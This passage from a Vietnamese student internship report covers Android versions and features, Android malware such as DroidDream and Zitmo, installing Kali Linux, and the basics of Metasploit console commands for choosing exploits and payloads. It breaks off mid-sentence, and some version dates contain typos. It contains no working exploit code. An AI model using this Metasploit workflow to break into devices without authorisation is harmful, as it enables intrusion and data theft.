mở rộng để kết hợp tự do giữa các công nghệ nổi trội. Nền tảng này sẽ tiếp tục phát triển bởi cộng
đồng phát triển để tạo ra các ứng dụng di động hoàn hảo.
1.3.2. Tính ngang bằng của các ứng dụng.
Với Android, không có sự khác nhau giữa các ứng dụng điện thoại cơ bản với ứng dụng của bên
thứ ba. Chúng được xây dựng để truy cập như nhau tới một loạt các ứng dụng và dịch vụ của điện
thoại. Với các thiết bị được xây dựng trên nền tảng Android, người dùng có thể đáp ứng đầy đủ các
nhu cầu mà họ thích. Chúng ta có thể đổi màn hình nền, kiểu gọi điện thoại, hay bất kể ứng
dụng nào. Chúng ta thậm chí có thể hướng dẫn điện thoại chỉ xem những ảnh mình thích.
1.3.3. Phá vỡ rào cản phát triển ứng dụng.
Android phá vỡ rào cản để tạo ứng dụng mới và cải tiến. Một người phát triển có thể kết hợp thông
tin từ trang web với dữ liệu trên điện thoại cá nhân – chẳng hạn như danh bạ, lịch hay vị trí trên
bản đồ – để cung cấp chính xác hơn cho người khác. Với Android, người phát triển có thể xây
dựng một ứng dụng mà cho phép người dùng xem vị trí của những người bạn và thông báo khi họ
đang ở vị trí lân cận. Tất cả được lập trình dễ dàng thông qua sự hỗ trợ của MapView và dịch vụ
định vị toàn cầu GPS.
1.3.4. Xây dựng ứng dụng dễ dàng và nhanh chóng
Android cung cấp bộ thư viện giao diện lập trình ứng dụng đồ sộ và các công cụ để viết các ứng
dụng phức tạp. Ví dụ, Android có thể cho phép người phát triển biết được vị trí của thiết bị và cho
phép các thiết bị giao tiếp với nhau để có thể tạo nên mạng xã hội chia sẻ ngang hàng rộng khắp.
Thêm nữa, Android còn bao gồm một bộ công cụ đầy đủ giúp cho việc phát triển trở nên dễ dàng.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 20
1.4.Các phiên bản của android
Lịch sử phiên bản của hệ điều hành di động Android bắt đầu với bản Android beta vào tháng 11
năm 2007. Phiên bản thương mại đầu tiên, Android 1.0, được phát hành vào tháng 9 năm 2008.
Android đang được phát triển bởi Google và Open Handset Alliance (OHA), và đã có một số bản
cập nhật cho hệ điều hành này kể từ khi ra mắt.
Từ tháng 4 2009, phiên bản Android được phát triển dưới tên mã là chủ đề bánh kẹo và phát hành
theo thứ tự bảng chữ cái: Cupcake (1.5), Donut (1.6), Eclair (2.0–2.1), Froyo (2.2–2.2.3),
Gingerbread (2.3–2.3.7), Honeycomb (3.0–3.2.6), Ice Cream Sandwich (4.0–4.0.4), Jelly Bean
(4.1–4.3), và KitKat (4.4). Vào 3 tháng 9 năm 2013, Google công bố rằng 1 tỉ thiết bị đã được kích
hoạt hiện sử dụng Android OS trên toàn cầu. Bản cập nhật Android gần đây nhất là KitKat 4.4, nó
được phát hành bản thương mại trên thiết bị 22 tháng 11 2013, thông qua cập nhật OTA.
Phiên bản API Tên Ngày phát hành
1.0 Cấp 1 23/9/ 2008
1.1 Cấp 2 9/2/2009
1.5 Cấp 3 Cupcake 30/4/2009
1.6 Cấp 4 Donut 15/9/2009
2.0 Cấp 5
Eclair
26/10/2009
2.0.1 Cấp 6 3/12/2009
2.1 Cấp 7 12/1/2010
2.2
Cấp 8 Froyo
20/5/2010
2.2.1 18/1/2011
2.2.2 22/1/2011
2.2.3 21/11/2011
2.3
Cấp 9 Gingerbread
6/12/2010
2.3.1 12/2010
2.3.2 1/2011
2.3.3
Cấp 10 Gingerbread
9/2/2011
2.3.4 28/4/2011
2.3.5 25/7/2011
2.3.6 2/9/2011
2.3.7 21/9/2011
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 21
3.0 Cấp 11
Honeycomb
22/2/2011
3.1 Cấp 12 10/5/2011
3.2
Cấp 13
15/7/2011
3.2.1 20/9/2011
3.2.2 30/8/2011
3.2.3
3.2.4 12/2011
3.2.5 1/2012
3.2.6 2/1012
4.0
Cấp 14
Ice Cream
Sandwich
19/10/2011
4.0.1 21/10/2011
4.0.2 28/11/2011
4.0.3
Cấp 15
16/12/2011
4.0.4 29/3/2012
4.1
Cấp 16 Jelly Bean
9/7/2012
4.1.1 23/7/2012
4.1.2 9/10/2012
4.2
Cấp 17
13/11/2012
4.2.1 27/11/2012
4.2.2 11/2/2013
4.3
Cấp 18
24/7/1013
4.3.1 3/10/2013
4.4
Cấp 19 KitKat
31/10/2013
4.4.1 5/12/2013
4.4.2 9/12/2013
4.4.3 2/6/2014
4.4.4 19/6/2014
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 22
1.5.Tỷ lệ sử dụng các phiên bản android
Phần lớn các thiết bị Android cho tới nay vẫn chạy hệ điều hành phiên bản 4.1.x Jelly Bean được
phát hành ngày 9 tháng 7 năm 2012 nhờ tính ổn định và hỗ trợ tốt các máy có cấu hình thấp cùng
với các phiên bản 4.x khác. Bên cạnh đó các thiết bị Android vẫn còn sử dụng các phiên bản cũ hơn
là 2.3 Gingerbread phát hành ngày 6 tháng 12 năm 2010.
Tỷ lệ sử dụng các phiên bản khác nhau tính đến ngày 20 tháng 7 năm 2014
1.6.So sánh android 2.3 (Gingerbread) và android 4.x (4.0 – Ice Cream Sandwich):
Android 2.3, tên mã là Gingerbread được phát hành vào ngày 6 tháng 12 năm 2010 và là một bản nâng
cấp của Android v2.2 Froyo. Các phiên bản 2.3 được thiết kế đặc biệt cho điện thoại thông minh, nó
được coi là một trong những phiên bản phổ biến nhất của Android cho điện thoại thông minh. Ngoài bố
trí đã có sẵn trên Froyo, công ty cung cấp các thay đổi như giao diện người dùng được cập nhật, tăng
tốc độ và sự đơn giản, hỗ trợ cho màn hình lớn hơn và độ phân giải cao, hỗ trợ cho hệ thống điện thoại
SIP VOIP, bàn phím ảo nhanh hơn và trực quan hơn, chức năng sao chép dán nâng cao, hỗ trợ NFC,
hiệu ứng âm thanh mới, quản lý download mới, hỗ trợ nhiều camera, hỗ trợ xem video WebM/VP8 và
AAC mã hóa âm thanh, cải thiện quản lý điện năng, chuyển từ YAFFS đến ext4 trên các thiết bị mới
hơn, âm thanh, đồ họa và cải tiến đầu vào cho các nhà phát triển trò chơi, đồng thời thu gom rác thải và
hỗ trợ cho các cảm biến nhiều hơn. Công ty cũng vận chuyển một cập nhật nhỏ cho Gingerbread theo
phiên bản 2.3.3-2.3.7. Những bản cập nhật được cung cấp tính năng mới như: hỗ trợ cho giọng nói hoặc
video chat, mở cửa phụ kiện hỗ trợ thư viện, cải tiến để ứng dụng gmail, hình ảnh động bóng cho danh
sách cuộn, cải tiến phần mềm máy ảnh và cải thiện hiệu quả pin.
Android 4.0 Ice Cream Sandwich đã được công khai phát hành vào ngày 19 Tháng 10 năm 2011. Các
Android 4.0 thật sự là một sự là một bản nâng cấp của 2.3 Gingerbread và được cung cấp một loạt các
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 23
tính năng mới. Android cũng đã có phiên bản 3.0, chỉ dành cho máy tính bảng. Phiên bản này về cơ bản
là một sự kết hợp của Android 2.3.x và Android 3.x. Công ty cung cấp các tính năng cập nhật như: nút
mềm, widgets, dễ dàng để tạo thư mục mới, cải thiện thư thoại trực quan, chức năng pinch-to-zoom,
chụp ảnh màn hình, bàn phím được cải thiện, khả năng truy cập các ứng dụng từ lockscreen, tính năng
mở khóa bằng nhận diện khuôn mặt, trình duyệt web theo thẻ, tự động đồng bộ hóa trình duyệt chrome
đánh dấu, kiểu chữ mới cho giao diện người dùng, cải thiện ứng dụng máy ảnh, được xây dựng trong
biên tập ảnh, bố trí bộ sưu tập mới, ứng dụng tích hợp với mạng xã hội, cập nhật trạng thái và hình ảnh
hi-res, khả năng tương thích NFC, tăng tốc phần cứng, quản lý wifi và quay video 1080p
1.6.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt
Android 2.3 Android 4.0
Cần ít nhất 128 MB bộ nhớ có sẵn cho Kernel
và cho không gian người sử dụng
Cần ít nhất 340 MB bộ nhớ có sẵn cho kernel và
cho không gian người sử dụng
Dung lượng Ram tối thiểu cần thiết là 150MB Dung lượng Ram tối thiểu cần thiết là 350 MB
Màn hình:
- Màn hình phải có kích cỡ ít nhất 2,5 inch
- Mật độ phải được ít nhất 100 dpi
- Tỉ lệ màn hình từ 1.333 (4:3) đến 1,779
(16:9)
- Công nghệ màn hình được sử dụng là
công nghệ “ Square pixels”
Màn hình:
- Màn hình phải có kích cỡ ít nhất
426x320
- Mật độ phải được ít nhất 100 dpi
- Tỉ lệ màn hình từ 1.333 (4:3) đến 1,85
(16:9)
Yêu cầu có các phím vậy lý Không yêu cầu có có phím vật lý
Các API Android bao gồm trình quản lý
download các ứng dụng có thể sử dụng để tải dữ
liệu.Trình quản lí download phải có khả năng tải
tập tin có dung lượng ít nhất 55 MB
Các API Android bao gồm trình quản lý
download các ứng dụng có thể sử dụng để tải dữ
liệu.Trình quản lí download phải có khả năng tải
tập tin có dung lượng ít nhất 100 MB
1.6.2. Sự khác nhau về giao diện
Giao diện người dùng của Android dựa trên nguyên tắc tác động trực tiếp, sử dụng cảm ứng
chạm tương tự như những động tác ngoài đời thực như vuốt, chạm, kéo dãn và thu lại để xử lý các
đối tượng trên màn hình. Sự phản ứng với tác động của người dùng diễn ra gần như ngay lập tức,
nhằm tạo ra giao diện cảm ứng mượt mà, thường dùng tính năng rung của thiết bị để tạo phản hồi
rung cho người dùng. Những thiết bị phần cứng bên trong như gia tốc kế, con quay hồi chuyển và
cảm biến khoảng cách được một số ứng dụng sử dụng để phản hồi một số hành động khác của người
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 24
dùng, ví dụ như điều chỉnh màn hình từ chế độ hiển thị dọc sang chế độ hiển thị ngang tùy theo vị
trí của thiết bị, hoặc cho phép người dùng lái xe đua bằng xoay thiết bị, giống như đang điều khiển
vô-lăng.
Các thiết bị Android sau khi khởi động sẽ hiển thị màn hình chính, điểm khởi đầu với các
thông tin chính trên thiết bị, tương tự như khái niệm desktop (bàn làm việc) trên máy tính để bàn.
Màn hính chính Android thường gồm nhiều biểu tượng (icon) và tiện ích (widget); biểu tượng ứng
dụng sẽ mở ứng dụng tương ứng, còn tiện ích hiển thị những nội dung sống động, cập nhật tự động
như dự báo thời tiết, hộp thư của người dùng, hoặc những mẩu tin thời sự ngay trên màn hình chính.
Màn hình chính có thể gồm nhiều trang xem được bằng cách vuốt ra trước hoặc sau, mặc dù giao
diện màn hình chính của Android có thể tùy chỉnh ở mức cao, cho phép người dùng tự do sắp đặt
hình dáng cũng như hành vi của thiết bị theo sở thích. Những ứng dụng do các hãng thứ ba có trên
Google Play và các kho ứng dụng khác còn cho phép người dùng thay đổi "chủ đề" của màn hình
chính, thậm chí bắt chước hình dáng của hệ điều hành khác như Windows Phone chẳng hạn. Phần
lớn những nhà sản xuất, và một số nhà mạng, thực hiện thay đổi hình dáng và hành vi của các thiết
bị Android của họ để phân biệt với các hãng cạnh tranh.
Ở phía trên cùng màn hình là thanh trạng thái, hiển thị thông tin về thiết bị và tình trạng kết
nối. Thanh trạng thái này có thể "kéo" xuống để xem màn hình thông báo gồm thông tin quan trọng
hoặc cập nhật của các ứng dụng, như email hay tin nhắn SMS mới nhận, mà không làm gián đoạn
hoặc khiến người dùng cảm thấy bất tiện. Trong các phiên bản đời đầu, người dùng có thể nhấn vào
thông báo để mở ra ứng dụng tương ứng, về sau này các thông tin cập nhật được bổ sung theo tính
năng, như có khả năng lập tức gọi ngược lại khi có cuộc gọi nhỡ mà không cần phải mở ứng dụng
gọi điện ra. Thông báo sẽ luôn nằm đó cho đến khi người dùng đã đọc hoặc xóa nó đi.
Android 2.3 Android 4.0
Giao diện đơn giản Giao diện tinh tế hơn, trong suốt và đẹp mắt hơn
Chỉ hỗ trợ phím ảo là phím Home Hỗ trợ các phím ảo: Home, Back, Menu
Không có widget menu Có Widget menu giúp tìm nhanh thông tin mà
không cần mở ứng dụng
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 25
1.6.3. Sự khác nhau về tính năng
Android 2.3 Android 4.0
Thiết kế tối ưu hóa cho Smartphone Thiết kế tối ưu hóa cho Smartphone và Tablet
Chỉ có thể xóa tất các các thông báo cùng lúc trên
trình quản lý
Chỉ có thể xóa riêng rẽ các thông báo cùng lúc
trên trình quản lý
Chỉ có thể trả lời, ngắt cuộc gọi khi màn hình bị
khóa
Có thể thực hiện thêm 1 số tính năng khi màn
hình bị khoái ngoài trả lời , ngắt cuộc gọi như gửi
tin nhắn
Không có tính năng mở khóa màn hình nhận diện
khuôn mặt
Có tính năng mở khóa màn hình nhận diện khuôn
mặt
Không hỗ trợ chỉnh sửa hình ảnh Hỗ trợ chỉnh sửa hình ảnh , tự động nhận diện
được tất cả các camera trên thiết bị
1.6.4. Sự khác nhau về giao thức mạng
Android 2.3 Android 4.0
Không hỗ trợ giao thức https Hỗ trợ giao thức https
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 26
2. Nghiên cứu về mã độc trong mỗi trường android
2.1.Malware là gì?
Malware (phần mềm độc hại) viết tắt của cụm từ Malicious Sofware, là một phần mềm máy tính
được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc và thay đổi các thực thi của hệ điều hành
cũng như các chương trình ứng dụng mà không có sự cho phép của người dùng và bằng một cách
nào đó mà người dùng nếu không để ý cũng không thể phát hiện được những thay đổi đó.
Hình 1.
Phần mềm độc hại đã xuất hiện từ rất lâu trên những hệ điều hành máy tính như Windows, các máy
tính MAC và Linux (ở một mức độ thấp hơn), và bây giờ nó đã trở thành một mối nguy hại không
nhỏ cho các thiết bị di động chạy Android. Sự có mặt của Android khiến cho các phần mềm độc
hại thêm phần thích thú, tích cực tấn công hơn tới đông đảo người dùng Android. Nói về vấn đề
này, Timothy Armstrong, một chuyên gia bảo mật tại Kaspersky Lab, cho biết: “Malware trên
Android được phát hiện nhiều hơn hầu như mỗi ngày. Thời gian gần đây, chúng tôi đã phát hiện ra
ba nhà phát triển ứng dụng (mà có khi là từ cùng 1 người) với tên gọi MYOURNET, Kingmall2010,
we20092020 đã cung cấp các ứng dụng để tải về miễn phí trên Android Market, mà hầu hết các
ứng dụng đó đều chứa mã độc”.
Hình 2.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 27
Năm 2012 là năm thứ hai cho thấy sự bùng nổ của phần mềm độc hại cho Android. Từ tám chương
trình độc hại duy nhất vào tháng 1 năm 2011, tỷ lệ phát hiện trung bình hàng tháng phần mềm độc
hại mới tấn công vào Android trong năm 2011 đã lên đến hơn 800 mẫu. Trong năm 2012, Kaspersky
Lab đã xác định trung bình 6.300 mẫu phần mềm độc hại trên thiết bị di động mới mỗi tháng. Nhìn
chung, trong năm 2012 số lượng mẫu độc hại cho Android được biết đến nhiều tăng hơn tám lần.
2.2.Phân loại
Đa số các phần mềm độc hại Android có thể được chia thành ba nhóm chính dựa theo chức năng:
- SMS Trojans: bòn rút tài khoản di động của các nạn nhân bằng cách gửi tin nhắn SMS đến
các số điện thoại được đánh giá cao.
- Backdoors: cung cấp truy cập trái phép vào smartphone, cài đặt các chương trình độc hại
khác hoặc ăn cắp dữ liệu cá nhân của người dùng.
- Cuối cùng là các phần mềm gián điệp nhằm mục tiêu thu thập trái phép dữ liệu cá nhân,
chẳng hạn như sổ địa chỉ và mật khẩu (hoặc thậm chí hình ảnh cá nhân).
Trong nửa đầu năm 2012, Backdoors, tin nhắn SMS, Trojans và phần mềm gián điệp chiếm 51%
các phần mềm độc hại cho Android mới được phát hiện. Trong bảng xếp hạng Top Ten phần mềm
độc hại cho Android đã bị chặn bởi Kaspersky Mobile Security hoặc Kaspersky Tablet Security,
SMS Trojans là phổ biến nhất và các ứng dụng hiển thị quảng cáo không mong muốn cho người sử
dụng ở vị trí thứ hai. Ít phổ biến rộng rãi nhưng nguy hiểm nhất là Trojans ngân hàng trên di động
thường xuyên làm việc kết hợp với các máy tính để bàn, ví dụ như Carberp.
Nền tảng Android cho phép cài đặt phần mềm từ các nguồn không tin cậy, và là một trong những
cách tốt nhất để đảm bảo sự lây nhiễm từ việc cài đặt các chương trình từ những trang web đáng
ngờ. Tuy nhiên, phần mềm độc hại trên nền tảng phân phối ứng dụng chính thức Google Play là
một xu hướng bắt đầu vào năm 2011 và tiếp tục trong năm 2012, bất chấp những nỗ lực tốt nhất
của Google để làm giảm hoạt động tội phạm mạng. Một trong những ví dụ “khác thường” nhất của
phần mềm độc hại trên di động trong năm 2012 là "Find and Call", ứng dụng đã len lỏi được vào
Google Play cũng như kho ứng dụng của Apple.
2.3.Cơ chế hoạt động của Malware
Lấy một ví dụ cụ thể về 1 Malware rất phổ biến trong thời gian vừa qua đó là Malware DroidDream.
Malware này hoạt động qua 2 giai đoạn:
Giai đoạn đầu: DroidDream được nhúng vào trong một ứng dụng (số lượng ứng
dụng chứa Malware này hiện đã nhiều hơn 50 ứng dụng) và sẽ chiếm được quyền root vào thiết bị
của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu tiên.
Giai đoạn 2: Tự động cài đặt một ứng dụng thứ 2 với một giấy phép đặc biệt cho phép
quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các thông tin
nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác. Một khi DroidDream
chiếm được quyền root, Malware này sẽ chờ đợi và âm thầm cài đặt một ứng dụng thứ hai,
DownloadProviderManager.apk như một ứng dụng hệ thống. Việc cài đặt ứng dụng hệ thống này
nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép. Nghiên
cứu cài đặt HĐH Android trên các thiết bị laptop, smartphone.Không giống như giai đoạn đầu,
người dùng phải khởi động ứng dụng để bắt đầu việc lây nhiễm, ở giai đoạn thứ 2 ứng dụng tự
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 28
động làm một số việc như là confirm, checkin….Một điều nữa khiến cho bạn không thể biết chúng
hoạt động lúc nào, đó là Malware DroidDream này được lập trình để làm hầu hết các công việc
của mình vào khoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau. Đây là khoảng thời gian mà
điện thoại ít có khả năng được sử dụng nhất. Điều này làm cho người dùng khó khăn hơn trong
việc phát hiện một hành vi bất thường trên chiếc smartphone của mình.
2.4.Mục đích của Malware DroidDream
DroidDream được coi là một trong những Malware đầu tiên trên Android, mục đích của con
DroidDream này mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của người dùng tự động cài
đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến thể của nó đã kịp thời biến đổi để gây
ra các mối nguy hại lớn hơn rất nhiều. Ví dụ như Hippo SMS có khả năng tự gửi tin nhắn mà
không cần sự cho phép của người dùng, việc này sẽ khiến tiền cước phí của người dùng tăng lên
một cách chóng mặt mà người dùng không biết rõ lí do tại sao. Hoặc một Malware khác là Zitmo,
Malware này đưa ra các ứng dụng kích hoạt mọi hành động liên quan đến dịch vụ ngân hàng, tiếp
nhận SMS gửi đến và chuyển tới máy chủ. Các đoạn code dùng 1 lần mà các ngân hàng thường gửi
tới khách hàng thông qua tin nhắn SMS để chứng thực sẽ bị thu thập bởi các malware này. Hiện
nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. Vấn đề này thực
sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị một theo dõi, vì vậy những mối
nguy hiểm từ mã độc trên android đang thực sự đe dọa đến an sự an toàn của người dùng hệ điều
hành này.
2.5.Dấu hiệu bị nhiễm các phần mềm độc hại
Cũng giống như trên máy tính, khi bị nhiễm malware, thiết bị Android của bạn sẽ có một số hành
động khác thường và bạn không thể thay đổi được bất kỳ điều gì.
- Sử dụng dữ liệu không rõ ràng: có rất nhiều phần mềm độc hại tồn tại để thu thập dữ liệu
về tài khoản, số thẻ tín dụng, danh bạ, vv... Một khi có được các thông tin này, nó sẽ tự động
được chuyển tiếp về cho người đã tạo ra nó. Và trong nhiều trường hợp, việc chuyển giao
thông tin này sẽ dẫn đến sự khác lạ trong sử dụng dữ liệu.
- Hiệu suất của thiết bị kém: tùy thuộc vào thời gian sử dụng và mức độ nghiêm trọng của
việc lây nhiễm mà hiệu suất điện thoại của bạn sẽ bị giảm đi nhiều hay ít, đặc biệt là khi bạn
đã khởi động lại thiết bị mà các vấn đề không được giảm bớt.
- Thời lượng pin bị giảm: do hầu hết các phần mềm độc hại đều được thiết kế để chạy nền
trong hệ thống, nên nó sẽ làm sụt giảm đáng kể thời lượng pin trên thiết bị của bạn.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 29
3. Xâm nhập android qua mạng local
3.1.Giới thiệu về Kali Linux
Trong những năm qua BackTrack là hệ điều hành được sử dụng nhiều nhất bởi các chuyên gia
đánh giá bảo mật. BackTrack bắt đầu xuất hiện vào năm 2006 và trong 7 năm qua nó đã không
ngừng cải tiến để đạt được một vị trí nhất định trong cộng đồng bảo mật trên khắp toàn thế giới.
Vì vậy, ngày nay thật khó để tìm thấy một người nào đó quan tâm đến an toàn thông tin mà
chưa từng nghe về BackTrack.
Tháng 3 năm 2013, Offensive Security đã tiến thêm một bước mới khi công bố phiên bản tiến
hóa của hệ điều hành BackTrack, tên của nó là Kali (được xem như phiên bản BackTrack 6), Kali
là tên nữ thần của người Hindu, hàm ý sự biến đổi và khả năng hủy diệt hay có lẽ là tên một môn
võ thuật của người Philippine ...
Để qua một bên chuyện tên với tuổi, Kali Linux là một OS rất hữu ích đối với những chuyên
gia đánh giá bảo mật, một OS tập hợp và phân loại gần như tất cả các công cụ thiết yếu mà bất kỳ
một chuyên gia đánh giá bảo mật nào cũng cần sử dụng đến khi tác nghiệp.
- Ưu điểm và Nhược điểm:
Đối với những người chưa biết BackTrack, nói một cách ngắn gọn BackTrack là một bản phân
phối Linux dựa trên nền tảng hệ điều hành Ubuntu, với nhiều công cụ bảo mật được phân loại rõ
ràng để sử dụng.
3.1.1. Kali phát triển trên nền tảng hệ điều hành Debian
Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho lưu trữ phần
mềm) được đồng bộ hóa với các Repository của Debian nên có thể dễ dàng có được các bản cập
nhật vá lỗi bảo mật mới nhất và các cập nhật Repository. Duy trì cập nhật (up-to-date) đối với các
công cụ Penetration Test là một yêu cầu vô cùng quan trọng.
Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý gói của Debian.
Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về mặt cấu trúc hệ thống tổng thể, nó
cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay đổi mã nguồn của các
công cụ.
Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc ARM.
Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra.
3.1.2. Hỗ trợ mạng không dây tốt hơn
Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ trợ cho
một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB Dongles. Một yêu cầu
quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây.
3.1.3. Khả năng tùy biến cao
Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao diện, giờ
đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME, KDE hoặc XFCE tùy
theo sở thích và thói quen sử dụng.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 30
3.1.4. Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai
Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành Kali. Với
BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều phải cài lại mới hoàn
toàn (Ngoại trừ phiên bản R2 lên R3 năm ngoái).
Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ dàng hơn
trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài lại mới hoàn
toàn nữa.
3.2.Cài đặt Kali Linux
Trước tiên ta phải vào trang http://www.kali.org/downloads/ để download file ISO phiên bản mới
nhất về
Hình 3.
Sau đó, ta bắt đầu cài cặt theo các bước bên dưới:
Hình 4. Hình 5.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 31
Hình 6. Hình 7.
Hình 8. Hình 9.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 32
Hình 10. Hình 11.
Hình 12. Hình 13.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 33
Hình 14. Hình 15.
Hình 16.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 34
Hình 17.
Hình 18.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 35
Hình 19.
Hình 20.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 36
Hình 21.
Hình 22.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 37
Hình 23.
Hình 24.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 38
Hình 25.
Hình 26.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 39
Hình 27.
Hình 28.
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 40
Hình 29.
3.3.Metasploit framework trong Kali linux
3.3.1. Giới thiệu
Metasploit framework là một framework mã nguồn mở phát triển nhằm sử dụng các shellcode
(payload) để tấn công máy có lỗ hổng. Cùng với một số bộ công cụ bảo mật khác. Metasploit có cơ
sở dữ liệu chứa hàng ngàn shellcode, hàng ngàn exploit của các hệ điều hành, các chương trình hay
dịch vụ. Trong quá trình phát triển metasploit liên tục cập nhật các exploit... nên càng ngày nó càng
trở thành một bộ công cụ mạnh mẽ.
Metasploit framework là một bộ dự án sinh ra để kiểm tra độ an toàn, nhưng đối với những hacker
thì nó thực sự là một công cụ vô cùng hữu ích (dùng để kiểm tra, khai thác lỗi, exploit…)
3.3.2. Sử dụng metasploit framework
3.3.2.1.Chọn module exploit: lựa chọn chương trình, dịch vụ lỗi mà metasploit có hỗ trợ để khai
thác
Muốn chọn ta có thể dùng lệnh "show exploits" để hiện ra tất cả các exploit mà metasploit
framework có hỗ trợ.
Để dùng exploit nào đó ta dùng câu lệnh "use name_exploit" .Trong đó tham số name_exploit là
tên của exploit đc metasploit hỗ trợ.
Để biết thêm các thông tin về exploit mà ta đã chọn có thể dùng lệnh "info name_exploit".
Báo cáo thực tập GVHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 41
Ví dụ: mình sử dụng một exploit sau khi đã liệt kê ra sẽ là:
use windows/manage/add_user_domain
3.3.2.2.Cấu hình module exploit đã chọn
Sau khi đã chọn một exploit với command use, việc tiếp theo là cấu hình các options mà exploit
này yêu cầu. Để rõ hơn exploit này nó yêu cầu cấu hình như thế nào, phải cấu hình những gì, ta sử
dụng lệnh "show options".
Khi sử dụng lệnh show option ta thường nhận đc một bảng gồm các cột như sau:
Name--------------Current Setting----------------Required---------------Description
Trong đó, ở cột required nếu giá trị là "yes" thì ta phải set giá trị cho tham số này, còn nếu là "no"
thì ta có thể set hoặc không. Quan trọng phải xem một số nó đã cấu hình mặc định cho rồi có thích
hợp với chúng ta hay không.
Ta dùng lệnh “set” để cấu hình những options của module đó.
Ngoài ra nó còn có thêm một số options khác, dùng "show advanced", "show evasion" để xem.
Sau khi cấu hình xong ta cần kiểm tra xem việc cấu hình đã đúng hay chưa. Để kiểm tra việc cấu
hình ta dùng lệnh "check" để xem mục tiêu có bị tấn công được hay không. Đây là một cách nhanh
để ta kiểm tra xem việt cấu hình các options bằng lệnh set có đúng hay không và mục tiêu thực sự
có lỗ hổng để khai thác được hay không. Nhưng không phải tất cả các exploit đều thực sự có thể
kiểm tra được bằng việc sự dụng lệnh check. Đôi khi ta phải thực sự exploit nó mới biết được.
3.3.2.3.Lựa chọn payload
Payload là một đoạn code đc chạy trên máy victim, dùng để thực hiện một số họat động nào đó,
hoặc dùng để kết nối về máy của hacker.
Vậy làm sao để có cái payload này trên máy của victim? Có 2 phương pháp chủ yếu được dùng. Đó
là gửi cho victim thông qua việc phân tính một lỗi, lỗ hổng nào đó trên hệ thống victim, từ đó đột
nhập và đưa đoạn payload này vào máy victim. Kiểu thứ 2 là gửi trực tiếp cho victim, chờ đợi
victim sơ ý nhận nó.
Để hiện thị các payloads tích hợp cho exploit hiện tại chúng ta đang dùng, ta dùng lệnh "show
payloads".
Tương ứng với mỗi OS khác nhau ta dùng một payload khác nhau, và phương pháp cũng khác nhau.
Các giao thức dùng cũng khác nhau... Nhìn chung đối với payload có thể phân ra làm 2 loại cơ bản
